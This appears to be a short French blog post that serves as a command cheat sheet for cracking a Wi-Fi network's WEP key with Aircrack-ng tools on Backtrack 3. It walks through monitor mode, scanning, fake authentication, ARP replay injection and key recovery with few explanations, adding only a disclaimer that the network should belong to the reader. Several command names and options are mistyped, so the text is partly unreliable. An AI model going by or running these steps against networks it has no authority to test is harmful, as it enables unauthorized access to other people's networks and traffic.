Rappel de commandes AirCrack

Pas de mise ne situation cette fois. Ce post n’a pas pour but la mise en place d’un service ou l’explication de quelque chose. C’est juste un résumé des commandes pour trouver la clé wep d’un réseau wifi, qui vous appartient évidemment, à l’aide des outils mis à disposition par Backtrack 3. Si vous voulez plus que les commandes, vous trouverez beaucoup de site avec des tutaux détaillés.Commençons tout d’abord par activer le mode de capture de packet sur la carte réseau :

# airmon-ng start wifi0

Vous verrez quelque lignes apparaitre à la suite de cette commande dont la dernière qui vous indiquera l’activation de la capture sur l’interface ath1 probablement. Rappelez vous cette interface, c’est celle que nous utiliserons par la suite.

Nous allons maintenant scanner les réseaux disponibles.

# airodump-ng –channel 0-11 –encrypt wep –bssid monreseauwifiamoi

Vous aurez remarqué quelque options relativement explicites. Je ne les expliques pas, le man le fera pour moi. Seul chose, comme il est spécifié, ce sont des options et elles sont donc « optionnelle ». Je sais c’est un pléonasme mais au moins c’est clair.

Passons ensuite à la « fake authentification » pour laquelle la plupart des paramètres auront été récupérés grâce à la commande précédente. Là encore pas de détail, juste la commande :

# airplay-ng -1 0 -e essid_du_reseau -a mac_du_point_d’accès -h mac_du_client_déjà_connecté

Si cela réussi, vous aurez un message qui vous le dira clairement. Commande suivante : l’injection

# aireplay -3 -b mac_du_point_d’accès -h mac_du_client_déjà_connecté -x vitesse_d’injection

Précision, la vitesse d’injection peux être de 100 à 1000 sachant qu’une valeur trop élevée peut faire planter le point d’accès.

Maintenant il faut attendre que les arp commencent à décoller et ensuite que les IVS arrivent à 300 000 dans le cas d’une attaque standard et seulement 40 000 si vous disposez du nouvel algo de décryptage. Une fois ces chiffres atteint :

# aircrack-ng -x *.cap

Ça c’est la commande simple. Pour un décryptage avec le nouvelle algo, remplacer le -x par -z. Pour plus de lisibilité, -0 et si ça ne marche pas, essayez de modifier le fudge factor avec -f et un chiffre de 2 à 12.

Voilà pour le résumé. Je me doute que pour les nouveaux c’est sûrement très confus mais pour ceux qui veulent juste un rappel des commandes ça devrait suffire. Je rappel encore une fois que l’utilisation de tels outils sur des réseaux qui ne vous appartient pas est punis par la loi.

Laisser un commentaire